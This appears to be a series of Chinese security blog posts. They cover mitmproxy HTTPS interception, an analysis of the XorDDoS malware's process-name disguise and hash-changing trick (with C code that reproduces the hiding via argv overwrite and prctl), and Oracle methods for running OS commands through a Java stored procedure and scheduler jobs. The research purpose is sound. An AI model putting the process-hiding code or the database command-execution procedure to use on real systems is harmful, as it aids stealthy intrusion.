发表于

主要特色:Intercept HTTP & HTTPS requests and responses and modify them on the fly

使用python编写,可以在windows,Linux, Mac 下运行,这点比 fiddler 有优势。可以修改
报文内容,这点很不错。

  1. 安装

参考 http://docs.mitmproxy.org/en/stable/install.html

1
2
sudo dnf install -y python-pip python-devel libffi-devel openssl-devel libxml2-devel libxslt-devel libpng-devel libjpeg-devel
sudo pip install mitmproxy  # or pip install --user mitmproxy
  1. 基本使用

mitmproxy -b a.b.c.d -p 8080

  • -b bind address
  • -p bind port
  • -s “script.py –bar”, –script “script.py –bar” Run a script. Surround with quotes to pass script
1
2
3
-b ADDR, --bind-address ADDR
-p PORT, --port PORT  Proxy service port.
-s mitmproxy 脚本

2.1 mitmproxy 界面操作

- ?            显示帮助信息
- i, j, k, l    上下左右,同 vi
- enter         进入具体报文
- tab           详细报文内容页面,显示标签调整
- E             导出报文内容
  1. HTTPS

使用mitmproxy 最大的原因就是因为它可以对付https报文。

3.1 导入mitmproxy的 CA

参考 http://docs.mitmproxy.org/en/stable/certinstall.html

mitmproxy 的 CA 证书放在 ~/.mitmproxy 目录, 可以在不同设备中添加。

3.2 目标设备为Linux

☆ Google Chrome

设置 -> HTTPS/SSL -> 证书管理 -> 授权中心

☆ Firefox

没用Firefox,估计也类似。

然后设置浏览器使用mitmproxy代理即可。

3.3 目标设备为 Android

3.3.1 导入证书

adb push ~/.mitmproxy/mitmproxy-ca-cert.cer /sdcard/Download

设置 -> 安全 -> 证书存储 -> 从手机存储安装, 选择上传的CA证书。

3.3.2 设置代理

emulator 上可以通过下面的命令行,设置代理。

./emulator -avd 7.0_x86 -http-proxy http://a.b.c.d:8080

真实的设备上,据网络上的文章说,可以通过设置 APN来实现,没有测试。

3.3.3 启动 mitmproxy

mitmproxy -b a.b.c.d -p 8080

  1. 透明模式

mitmproxy 支持透明部署,具体的方法可以参考下面的文章。

http://docs.mitmproxy.org/en/stable/transparent/linux.html

  1. 修改报文内容

github 上有很多例子,这次没有需求,可以参考

https://github.com/mitmproxy/mitmproxy/tree/v0.18.2/examples

官方文档上给了个简单例子

1
2
def response(flow):
    flow.response.headers["newheader"] = "foo"

给http响应报文的头部添加一个 newheader 的字段。

  1. socks 模式

–socks 作为 SOCKS5 proxy server

  1. 总结

这里说到的内容非常少,mitmproxy这个工具还是很强大的。

发表于

进程隐藏

上周由于工作原因接触到xorddos的样本,这个样本在过去一年的时间里非常常见,
变种也很多,拿到的样本比较有趣的是 ps 无法发现进程。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[root@localhost ~]# ps -ef  | grep /usr/bin

...

root      4597  4594  0 00:37 ?        00:00:00 gnome-pty-helper
root      4598  4594  0 00:37 pts/1    00:00:00 bash
oracle    5359     1  0 00:41 ?        00:00:00 ora_smco_orcl
oracle    5378     1  0 00:41 ?        00:00:00 ora_w000_orcl
oracle    5586     1  0 00:42 ?        00:00:00 ora_j000_orcl
oracle    5588     1  0 00:42 ?        00:00:00 ora_j001_orcl
root      5666     1  0 00:43 ?        00:00:00 sh
root      5669     1  0 00:43 ?        00:00:00 echo "find"
root      5672     1  0 00:43 ?        00:00:00 ls -la
root      5675     1  0 00:43 ?        00:00:00 bash
root      5678     1  0 00:43 ?        00:00:00 gnome-terminal
root      5683     1  0 00:43 ?        00:00:00 cd /etc
root      5686     1  0 00:43 ?        00:00:00 top
root      5689     1  0 00:43 ?        00:00:00 sh
root      5692     1  0 00:43 ?        00:00:00 gnome-terminal
root      5695     1  0 00:43 ?        00:00:00 ifconfig
root      5696  4598  0 00:43 pts/1    00:00:00 ps -ef

而使用lsof却可以清除地看见样本正在努力地干活。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
[root@localhost ~]# lsof +d /usr/bin
COMMAND    PID USER  FD   TYPE DEVICE    SIZE    NODE NAME
hidd      1853 root txt    REG    3,1   33708 2467454 /usr/bin/hidd
ckucbzknt 2014 root txt    REG    3,1  610331 2459176 /usr/bin/ckucbzkntb
xfs       2143  xfs txt    REG    3,1  107460 2468483 /usr/bin/xfs
Xorg      3117 root txt    REG    3,1 1890596 2466732 /usr/bin/Xorg
gnome-ses 4073 root txt    REG    3,1  129356 2459482 /usr/bin/gnome-session
ssh-agent 4201 root txt    REG    3,1   88996 2467513 /usr/bin/ssh-agent
dbus-laun 4245 root txt    REG    3,1   23796 2471600 /usr/bin/dbus-launch
gnome-key 4255 root txt    REG    3,1   97396 2473617 /usr/bin/gnome-keyring-daemon
metacity  4290 root txt    REG    3,1  521080 2464500 /usr/bin/metacity
gnome-pan 4296 root txt    REG    3,1  540868 2465177 /usr/bin/gnome-panel
nautilus  4298 root txt    REG    3,1 1348932 2461620 /usr/bin/nautilus
gnome-vol 4310 root txt    REG    3,1   65240 2464498 /usr/bin/gnome-volume-manager
bt-applet 4334 root txt    REG    3,1   30452 2464773 /usr/bin/bt-applet
nm-applet 4352 root txt    REG    3,1  312432 2467723 /usr/bin/nm-applet
gnome-pow 4381 root txt    REG    3,1  195284 2459473 /usr/bin/gnome-power-manager
pam-panel 4383 root txt    REG    3,1   39148 2461862 /usr/bin/pam-panel-icon
dbus-laun 4473 root txt    REG    3,1   23796 2471600 /usr/bin/dbus-launch
gnome-scr 4512 root txt    REG    3,1  168628 2468487 /usr/bin/gnome-screensaver
gnome-ter 4594 root txt    REG    3,1  309368 2464648 /usr/bin/gnome-terminal
gadcgkcqn 4681 root txt    REG    3,1  610331 2460159 /usr/bin/gadcgkcqni
gadcgkcqn 4684 root txt    REG    3,1  610331 2460159 /usr/bin/gadcgkcqni
gadcgkcqn 4687 root txt    REG    3,1  610331 2460159 /usr/bin/gadcgkcqni
gadcgkcqn 4690 root txt    REG    3,1  610331 2460159 /usr/bin/gadcgkcqni
gadcgkcqn 4693 root txt    REG    3,1  610331 2460159 /usr/bin/gadcgkcqni

阅读汇编代码,分析具体原因,发现xorddos将一些关键信息加密了,F5处理过的代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int __cdecl encrypt_code(int a1, int a2)
{
  signed int v2; // ecx@2

  if ( a2 > 0 )
  {
    v2 = 0;
    do
    {
      *(_BYTE *)(v2 + a1) ^= xorkeys[(((_BYTE)v2 + ((unsigned int)(v2 >> 31) >> 28)) & 0xF)
                                   - ((unsigned int)(v2 >> 31) >> 28)];
      ++v2;
    }
    while ( v2 != a2 );
  }
  return a1;
}

xorkey 为 BB2FA36AAA9541F0

用idapython 写个小脚本,简单处理一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from idautils import *
from idc import *


def get_string(addr):
  out = ""
  while True:
    if Byte(addr) != 0:
      out += chr(Byte(addr))
    else:
      break
    addr += 1
  return out
 
def decrypt(data):

  xorkey = 'BB2FA36AAA9541F0'
  length = len(data)
  o = ""
  if length > 0:
    v2 = 0
    while v2 < length:
      o += chr( ord(data[v2]) ^  ord(xorkey[((v2 + ((v2 >> 31) >> 28)) & 0xF) - ( (v2 >> 31) >> 28)]) )
      v2 += 1

  return o

ea = ScreenEA()
string = get_string(ea)
dec = decrypt(string)
print 'Addr: 0x%x, %s' % (ea, dec)
MakeComm(ea, dec)

处理后可以看到伪装的命令行信息,daemonname。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
.data:080CBB40 daemonname      db '!#Ff3VE.-7',17h,'V[_ 0',0 ; DATA XREF: main+31Eo
.data:080CBB40                                         ; main+4AEo ...
.data:080CBB40                                         ; cat resolv.conf
.data:080CBB51                 align 4
.data:080CBB54 a12             db '1*2',0              ; sh
.data:080CBB58                 db    0
.data:080CBB59                 db    0
.data:080CBB5A                 db    0
.data:080CBB5B                 db    0
.data:080CBB5C                 db    0
.data:080CBB5D                 db    0
.data:080CBB5E                 db    0
.data:080CBB5F                 db    0
.data:080CBB60                 db    0
.data:080CBB61                 db    0
.data:080CBB62                 db    0
.data:080CBB63                 db    0
.data:080CBB64                 db    0
.data:080CBB65                 db    0
.data:080CBB66                 db    0
.data:080CBB67                 db    0
.data:080CBB68                 db  20h                 ; bash
.data:080CBB69                 db  23h ; #
.data:080CBB6A                 db  41h ; A
.data:080CBB6B                 db  2Eh ; .
.data:080CBB6C                 db  41h ; A
.data:080CBB6D                 db    0
.data:080CBB6E                 db    0
.data:080CBB6F                 db    0
.data:080CBB70                 db    0
.data:080CBB71                 db    0

...

.data:080CBBB8                 db  2Eh ; .             ; ls -la
.data:080CBBB9                 db  31h ; 1
.data:080CBBBA                 db  12h
.data:080CBBBB                 db  6Bh ; k
.data:080CBBBC                 db  2Dh ; -
.data:080CBBBD                 db  52h ; R
.data:080CBBBE                 db  36h ; 6
.data:080CBBBF                 db    0
.data:080CBBC0                 db    0
.data:080CBBC1                 db    0
.data:080CBBC2                 db    0
.data:080CBBC3                 db    0
.data:080CBBC4                 db    0
.data:080CBBC5                 db    0
.data:080CBBC6                 db    0
.data:080CBBC7                 db    0
.data:080CBBC8                 db    0
.data:080CBBC9                 db    0
.data:080CBBCA                 db    0
.data:080CBBCB                 db    0
.data:080CBBCC                 db  36h ; 6             ; top
.data:080CBBCD                 db  2Dh ; -
.data:080CBBCE                 db  42h ; B
.data:080CBBCF                 db  46h ; F
.data:080CBBD0                 db    0
.data:080CBBD1                 db    0
.data:080CBBD2                 db    0

...

呵呵,已经看到 top, ls -al 等信息了,查看daemonname 的交叉引用,发现在main函数
中,到main里看看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
.text:0804AC30 ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:0804AC30                 public main
.text:0804AC30 main            proc near               ; DATA XREF: _start+17o

....

.text:0804AF4E                 mov     ebx, offset daemonname ; "!#Ff3VE.-7\x17V[_ 0"

...

.text:0804AFC2 loc_804AFC2:                            ; CODE XREF: main+3ABj
.text:0804AFC2                 mov     [esp], ebx
.text:0804AFC5                 add     ebx, 14h
.text:0804AFC8                 mov     dword ptr [esp+4], 14h
.text:0804AFD0                 call    encrypt_code
.text:0804AFD5                 cmp     ebx, offset unk_80CBD0C
.text:0804AFDB                 jnz     short loc_804AFC2

这段汇编代码,使用了一个循环,调用encrypt_code 对daemonname进行了解密。
后面的代码,用到了daemonname的地方有下面几处,

第一处

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
.text:0804B29F                 call    getpid
.text:0804B2A4                 mov     dword ptr [esp+8], (offset aDD+3) ; "%d"
.text:0804B2AC                 mov     dword ptr [esp+4], 0Ah
.text:0804B2B4                 mov     [esp], esi             ;第三形参 pid
.text:0804B2B7                 mov     [esp+0Ch], eax
.text:0804B2BB                 call    snprintf
.text:0804B2C0                 mov     dword ptr [esp+4], 17h
.text:0804B2C8                 mov     dword ptr [esp], 0
.text:0804B2CF                 call    randomid
.text:0804B2D4                 mov     [esp+8], esi
.text:0804B2D8                 mov     [esp], edi             ;第一形参 要跑的木马
.text:0804B2DB                 movzx   eax, ax
.text:0804B2DE                 lea     eax, [eax+eax*4]
.text:0804B2E1                 lea     eax, daemonname[eax*4] ; "!#Ff3VE.-7\x17V[_ 0"
.text:0804B2E8                 mov     [esp+4], eax           ; 第二形参  daemonname
.text:0804B2EC                 call    LinuxExec_Argv2

第二处

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
.text:0804B932                 lea     edx, [ebp+var_1888]
.text:0804B938                 add     ebx, 1
.text:0804B93B                 mov     [esp], edx
.text:0804B93E                 call    randmd5
.text:0804B943                 mov     [ebp+var_22], 0
.text:0804B94A                 mov     [ebp+var_1E], 0
.text:0804B951                 mov     [ebp+var_1A], 0
.text:0804B957                 call    getpid
.text:0804B95C                 mov     dword ptr [esp+8], (offset aDD+3) ; "%d"
.text:0804B964                 mov     dword ptr [esp+4], 0Ah
.text:0804B96C                 mov     [esp], esi
.text:0804B96F                 mov     [esp+0Ch], eax
.text:0804B973                 call    snprintf
.text:0804B978                 mov     dword ptr [esp+4], 17h
.text:0804B980                 mov     dword ptr [esp], 0
.text:0804B987                 call    randomid
.text:0804B98C                 mov     [esp+8], esi
.text:0804B990                 movzx   eax, ax
.text:0804B993                 lea     eax, [eax+eax*4]
.text:0804B996                 lea     eax, daemonname[eax*4] ; "!#Ff3VE.-7\x17V[_ 0"
.text:0804B99D                 mov     [esp+4], eax
.text:0804B9A1                 lea     eax, [ebp+var_1888]
.text:0804B9A7                 mov     [esp], eax
.text:0804B9AA                 call    LinuxExec_Argv2

第三处

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
.text:0804B9DF                 lea     edx, [ebp+var_1C88]
.text:0804B9E5                 add     ebx, 1
.text:0804B9E8                 mov     [esp], edx
.text:0804B9EB                 call    randmd5
.text:0804B9F0                 mov     [ebp+var_22], 0
.text:0804B9F7                 mov     [ebp+var_1E], 0
.text:0804B9FE                 mov     [ebp+var_1A], 0
.text:0804BA04                 call    getpid
.text:0804BA09                 mov     dword ptr [esp+8], (offset aDD+3) ; "%d"
.text:0804BA11                 mov     dword ptr [esp+4], 0Ah
.text:0804BA19                 mov     [esp], esi
.text:0804BA1C                 mov     [esp+0Ch], eax
.text:0804BA20                 call    snprintf
.text:0804BA25                 mov     dword ptr [esp+4], 17h
.text:0804BA2D                 mov     dword ptr [esp], 0
.text:0804BA34                 call    randomid
.text:0804BA39                 mov     [esp+8], esi
.text:0804BA3D                 movzx   eax, ax
.text:0804BA40                 lea     eax, [eax+eax*4]
.text:0804BA43                 lea     eax, daemonname[eax*4] ; "!#Ff3VE.-7\x17V[_ 0"
.text:0804BA4A                 mov     [esp+4], eax
.text:0804BA4E                 lea     eax, [ebp+var_1C88]
.text:0804BA54                 mov     [esp], eax
.text:0804BA57                 call    LinuxExec_Argv2

都是作为LinuxExec_Argv2 参数使用的,接着来看LinuxExec_Argv2 的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
.text:08048520 LinuxExec_Argv2 proc near               ; CODE XREF: DelService+B3p
.text:08048520                                         ; DelService+CBlp ...
.text:08048520
.text:08048520 argv            = dword ptr -18h
.text:08048520 var_14          = dword ptr -14h
.text:08048520 var_10          = dword ptr -10h
.text:08048520 var_C           = dword ptr -0Ch
.text:08048520 var_8           = dword ptr -8
.text:08048520 var_4           = dword ptr -4
.text:08048520 file            = dword ptr  8
.text:08048520 arg_4           = dword ptr  0Ch
.text:08048520 arg_8           = dword ptr  10h
.text:08048520
.text:08048520                 push    ebp
.text:08048521                 mov     ebp, esp
.text:08048523                 sub     esp, 28h
.text:08048526                 mov     [ebp+var_4], esi
.text:08048529                 mov     esi, [ebp+file]
.text:0804852C                 mov     [ebp+var_8], ebx
.text:0804852F                 mov     [ebp+argv], 0
.text:08048536                 mov     [ebp+var_14], 0
.text:0804853D                 mov     [ebp+var_10], 0
.text:08048544                 mov     [ebp+var_C], 0
.text:0804854B                 call    doublefork
.text:08048550                 test    eax, eax
.text:08048552                 jz      short ZERO
.text:08048554                 mov     ebx, [ebp+var_8]
.text:08048557                 mov     esi, [ebp+var_4]
.text:0804855A                 mov     esp, ebp
.text:0804855C                 pop     ebp
.text:0804855D                 retn
.text:0804855E ; ---------------------------------------------------------------------------
.text:0804855E
.text:0804855E ZERO:                                   ; CODE XREF: LinuxExec_Argv2+32j
.text:0804855E                 mov     ebx, 3
.text:08048563
.text:08048563 LOOP:                                   ; CODE XREF: LinuxExec_Argv2+54j
.text:08048563                 mov     [esp], ebx      ; fd
.text:08048566                 add     ebx, 1
.text:08048569                 call    close
.text:0804856E                 cmp     ebx, 400h       ;400h == 1024
.text:08048574                 jnz     short LOOP
.text:08048576                 mov     eax, [ebp+arg_4]
.text:08048579                 mov     [ebp+argv], esi
.text:0804857C                 mov     [esp], esi      ; file
.text:0804857F                 mov     [ebp+var_14], eax
.text:08048582                 mov     eax, [ebp+arg_8];eax = pid
.text:08048585                 mov     [ebp+var_10], eax
.text:08048588                 lea     eax, [ebp+argv]
.text:0804858B                 mov     [esp+4], eax    ; argv
.text:0804858F                 call    execvp
.text:08048594                 mov     dword ptr [esp], 0 ; status
.text:0804859B                 call    exit
.text:0804859B LinuxExec_Argv2 endp

LinuxExec_Argv2 有三个参数。最终执行了execvp

1
2
3
4
.text:0804857C                 mov     [esp], esi      ; file 
...
.text:0804858B                 mov     [esp+4], eax    ; argv
.text:0804858F                 call    execvp

伪代码为,

1
execvp(file, &argv);

file 就是arg_0, 需要分析argv, 调出栈图就比较清晰了。

1
2
3
4
5
6
7
8
9
10
11
-00000018 argv            dd ?                    ; offset
-00000014 var_14          dd ?
-00000010 var_10          dd ?
-0000000C var_C           dd ?
-00000008 var_8           dd ?
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 file            dd ?                    ; offset
+0000000C arg_4           dd ?
+00000010 arg_8           dd ?

首先是这句

1
2
3
4
5
.text:08048529                 mov     esi, [ebp+file]
...
.text:0804852F                 mov     [ebp+argv], 0
...
.text:08048579                 mov     [ebp+argv], esi

执行了这几句代码后,栈图发生了变化

1
2
3
4
5
6
7
8
9
10
11
-00000018 argv            arg_0                       ; offset
-00000014 var_14          dd ?
-00000010 var_10          dd ?
-0000000C var_C           dd ?
-00000008 var_8           dd ?
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 file            dd ?                    ; offset
+0000000C arg_4           dd ?
+00000010 arg_8           dd ?

再看这几句代码

1
2
3
4
.text:08048576                 mov     eax, [ebp+arg_4]
.text:08048579                 mov     [ebp+argv], esi
...
.text:0804857F                 mov     [ebp+var_14], eax

执行了这几句代码后,栈图发生了变化

1
2
3
4
5
6
7
8
9
10
11
-00000018 argv            arg_0                   ; offset
-00000014 var_14          arg_4
-00000010 var_10          dd ?
-0000000C var_C           dd ?
-00000008 var_8           dd ?
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 file            dd ?                    ; offset
+0000000C arg_4           dd ?
+00000010 arg_8           dd ?

接下来是这几句代码

1
2
.text:08048582                 mov     eax, [ebp+arg_8];eax = pid
.text:08048585                 mov     [ebp+var_10], eax

执行了这几句代码后,栈图发生了变化

1
2
3
4
5
6
7
8
9
10
11
12
-00000018 argv            arg_0                   ; offset
-00000014 var_14          arg_4
-00000010 var_10          arg_8
-0000000C var_C           0
-00000008 var_8           dd ?
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 file            dd ?                    ; offset
+0000000C arg_4           dd ?
+00000010 arg_8           dd ?
`

main函数中对LinuxExec_Argv2 的调用的为代码为

1
LinuxExec_Argv2('木马路径', '伪装命令行', pid);

因此最后调用的execvp的伪代码为

1
execvp('木马路径', argv);

将进入 main 函数参数个数为3的流程,用IDA重命名后,关键代码为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
text:0804B5D3 PARAM_NUM_3:                            ; CODE XREF: main+3CDj

.text:0804B5D3                 lea     eax, [ebp+var_18]
.text:0804B5D6                 mov     [esp+4], eax
.text:0804B5DA                 lea     eax, [ebp+self_path]
.text:0804B5E0                 mov     [esp], eax
.text:0804B5E3                 call    readfile
.text:0804B5E8                 mov     edx, [ebp+argv_arr]
.text:0804B5EE                 mov     ebx, [edx+4]
.text:0804B5F1                 mov     [ebp+self_file_content], eax
.text:0804B5F7                 mov     [esp], ebx
.text:0804B5FA                 call    strlen
.text:0804B5FF                 mov     [esp+4], ebx
.text:0804B603                 mov     [esp+8], eax
.text:0804B607                 lea     eax, [ebp+fake_cmd]
.text:0804B60D                 mov     [esp], eax
.text:0804B610                 call    memmove
.text:0804B615                 mov     dword ptr [esp+0Ch], 0
.text:0804B61D                 mov     dword ptr [esp+8], 0Ah
.text:0804B625                 mov     dword ptr [esp+4], 0
.text:0804B62D                 mov     edx, [ebp+argv_arr]
.text:0804B633                 mov     eax, [edx+8]
.text:0804B636                 mov     [esp], eax
.text:0804B639                 call    __strtol_internal
.text:0804B63E                 mov     esi, eax
.text:0804B640                 mov     eax, [ebp+argv_arr]
.text:0804B646                 mov     ebx, [eax]
.text:0804B648                 mov     [esp], ebx
.text:0804B64B                 call    strlen
.text:0804B650                 mov     [esp], ebx
.text:0804B653                 mov     dword ptr [esp+4], 0
.text:0804B65B                 mov     [esp+8], eax
.text:0804B65F                 call    memset
.text:0804B664                 mov     edx, [ebp+argv_arr]
.text:0804B66A                 mov     ebx, [edx+4]
.text:0804B66D                 mov     [esp], ebx
.text:0804B670                 call    strlen
.text:0804B675                 mov     [esp], ebx
.text:0804B678                 mov     dword ptr [esp+4], 0
.text:0804B680                 mov     [esp+8], eax
.text:0804B684                 call    memset
.text:0804B689                 mov     eax, [ebp+argv_arr]
.text:0804B68F                 mov     ebx, [eax+8]
.text:0804B692                 mov     [esp], ebx
.text:0804B695                 call    strlen
.text:0804B69A                 mov     [esp], ebx
.text:0804B69D                 mov     dword ptr [esp+4], 0
.text:0804B6A5                 mov     [esp+8], eax
.text:0804B6A9                 call    memset
.text:0804B6AE                 lea     edx, [ebp+fake_cmd]
.text:0804B6B4                 mov     [esp+4], edx
.text:0804B6B8                 mov     edx, [ebp+argv_arr]
.text:0804B6BE                 mov     eax, [edx]
.text:0804B6C0                 mov     [esp], eax
.text:0804B6C3                 call    strcpy
.text:0804B6C8                 lea     eax, [ebp+filename]
.text:0804B6CE                 mov     [esp+0Ch], esi
.text:0804B6D2                 lea     esi, [ebp+randstr_10]

上面代码的原理大致等同于下面这段代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv){
    char fake_cmd[256];
    memset(&fake_cmd, 0, 256);
    char * argv_arr_1 = argv[1];
    int argv_arr_1_length = strlen(argv[1]);
    memmove(&fake_cmd, argv_arr_1, argv_arr_1_length);
    long pid_long = strtol(argv[2], 0, 10);
    char * v29 = (char *)*argv;
    int v30 = strlen(*argv);
    memset(v29, 0, v30);
    char * v31 = argv[1];
    int v32 = strlen(argv[1]);
    memset(v31, 0, v32);
    char * v33 = argv[2];
    int v34 = strlen(argv[2]);
    memset(v33, 0, v34);
    strcpy(*argv, fake_cmd);
    sleep(300);
}

编译后执行可以看到效果和运行样本的一样。

1
2
3
4
5
6
7
8
9
10
11
➜  ~ gcc -o fakeexe exe.c
➜  ~ ./fakeexe "ls -al" 2554

➜  ~ cat /proc/2605/cmdline
ls -al

➜  ~ ls -l /proc/2605/exe
lrwxrwxrwx. 1 henices henices 0 8月   2 12:01 /proc/2605/exe -> /home/henices/research/xorddos/fakeexe

➜  ~ ps -elf | grep "ls -al" | grep -v grep
0 S henices   2605 25307  0  80   0 -  1043 hrtime 12:01 pts/5    00:00:00 ls -al

其实效果并不好,可以轻易发现踪迹。

1
2
➜  ~ ps -e | grep fakeexe
 2605 pts/9    00:00:00 fakeexe

其实有更好的做法,使用 prctl ,至少可以把ps给搞定。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/prctl.h>

int main(int argc, char **argv){
    char fake_cmd[256];
    memset(&fake_cmd, 0, 256);
    char * argv_arr_1 = argv[1];
    int argv_arr_1_length = strlen(argv[1]);
    memmove(&fake_cmd, argv_arr_1, argv_arr_1_length);
    long pid_long = strtol(argv[2], 0, 10);
    char * v29 = (char *)*argv;
    int v30 = strlen(*argv);
    memset(v29, 0, v30);
    char * v31 = argv[1];
    int v32 = strlen(argv[1]);
    memset(v31, 0, v32);
    char * v33 = argv[2];
    int v34 = strlen(argv[2]);
    memset(v33, 0, v34);
    strcpy(*argv, fake_cmd);
    prctl(PR_SET_NAME, "bash");
    sleep(300);
}

编译执行后可以看到效果。

1
2
3
4
5
6
7
8
➜  ~ ps -e | grep bash
 4858 pts/5    00:00:00 bash

➜  ~ cat /proc/4858/cmdline 
ls -al

➜  ~ lsof -d txt | grep fakeexe
bash       4858 henices txt       REG  253,2      8816  4588423 /home/henices/research/xorddos/fakeexe

xorddos 的多态 (Polymorphic)

xorddos这个样本还值得一提的是,这个样本会不断变化,多态这个词翻译的可能不太准确,
可以参见上面的英文,自行理解。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int __cdecl randmd5(char *filename)
{
  int fd; // eax@1
  int fd_dup; // esi@1
  mode_t v4; // [sp+8h] [bp-20h]@0
  int addr; // [sp+15h] [bp-13h]@1
  int v6; // [sp+19h] [bp-Fh]@1
  __int16 v7; // [sp+1Dh] [bp-Bh]@1
  char v8; // [sp+1Fh] [bp-9h]@1

  addr = 0;
  v6 = 0;
  v7 = 0;
  v8 = 0;
  fd = open(filename, 1, v4);
  fd_dup = fd;
  if ( fd > 0 )
  {
    lseek(fd, 0, SEEK_END);
    randstr((int)&addr, 10);
    write(fd_dup, &addr, 11u);
    close(fd_dup);
  }
  return 0;
}

xorddos 样本多态主要就是用这个函数,每次在文件末尾写上10个字节的随机字符。
这样样本md5和大小都会发生变化,使得一些检测方法失效。

其他

正因为这种隐藏方法并不理想,后面xorddos出现了带rootkit的版本,进化了。

发表于

1. 正统方法

1.1 使用JAVA

1.1.1 代码

Oracle 数据库都支持Java,可以利用java来实现我们需要的功能。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
import java.lang.*;
import java.io.*;

public class JAVACMD
{
 public static void execCommand (String command) throws IOException
 {
    try {
        String[] finalCommand;
        if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
            finalCommand = new String[4];
            finalCommand[0] = "C:\\windows\\system32\\cmd.exe";
            finalCommand[1] = "/y";
            finalCommand[2] = "/c";
            finalCommand[3] = command;
        } else {
            finalCommand = new String[3];
            finalCommand[0] = "/bin/sh";
            finalCommand[1] = "-c";
            finalCommand[2] = command;
        }
        Process p = Runtime.getRuntime().exec(finalCommand);
        if (p.waitFor() != 0) {
            if (p.exitValue() == 1)
               System.err.println("command execute failed.");
        }
        BufferedInputStream in = new BufferedInputStream(p.getInputStream());
        BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
        String lineStr;
        while ((lineStr = inBr.readLine()) != null)
            System.out.println(lineStr);
        inBr.close();
        in.close();
    } catch (Exception e) {
        e.printStackTrace();
    } 
 }
};
/

CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVACMD.execCommand (java.lang.String)';
/

1.1.2 设置输出

1
2
set serveroutput on size 100000;
exec dbms_java.set_output(100000);

1.1.3 需要的权限

可以使用下面的语句查询相关权限

  • 用户权限
1
select * from session_privs;
  • JAVA 权限
1
2
select * from dba_java_policy;
select * from user_java_policy;

使用java代码执行系统命令需要的权限,可以使用下面语句进行授权:

1
2
3
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');

1.1.4 实验结果

非常不错支持回显。

1
2
3
4
5
SQL> exec javacmdproc('/bin/uname -a');
Linux localhost.localdomain 2.6.32-100.34.1.el6uek.i686 #1 SMP Wed May 25
17:28:36 EDT 2011 i686 i686 i386 GNU/Linux

PL/SQL procedure successfully completed.

1.1.5 注意

需要使用全路径

1.2 DBMS_SCHEDULAR

1.2.1 DBMS_SCHEDULAR 简介

这个和Windows上的计划任务类似。

1.2.2 需要的权限

  1. CREATE JOB
  2. CREATE EXTERNAL JOB
  3. EXECUTE on dbms_scheduler (granted to public by default)

grant create job, create external job to scott ;

1.2.3 执行的语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
program_name=> 'MyCmd',
program_type=> 'EXECUTABLE',
-- Use the ampersand to break out
program_action => '/tmp/a.sh',
enabled=> TRUE,
comments=> 'Run a command using shell metacharacters.'
 );
END;
/

BEGIN
DBMS_SCHEDULER.CREATE_JOB (
   job_name=> 'X',
   program_name=> 'MyCmd',
   repeat_interval=> 'FREQ=SECONDLY;INTERVAL=10',
   enabled=> TRUE,
   comments=> 'Every 10 seconds');
END;
/

exec DBMS_SCHEDULER.RUN_JOB ( job_name=> 'X');

1.2.4 注意

  1. 原先使用 || 等 metacharacters 的bug已经修复,只能使用参数
  2. Windows系统必须开启OracleJobSchedulerSID 服务
  3. Linux系统上相关文件的权限必须正确
  4. 高版本的Linux,执行的group已经被Oracle将为nobody

总之这个方法局限行很大,不推荐使用,列在这里只是做一个备忘。

1.3 使用oradebug

  • oradebug 简介
    oradebug是一个神奇的命令, 能干很多活, 但是Oracle却很少提及,属于undocumented
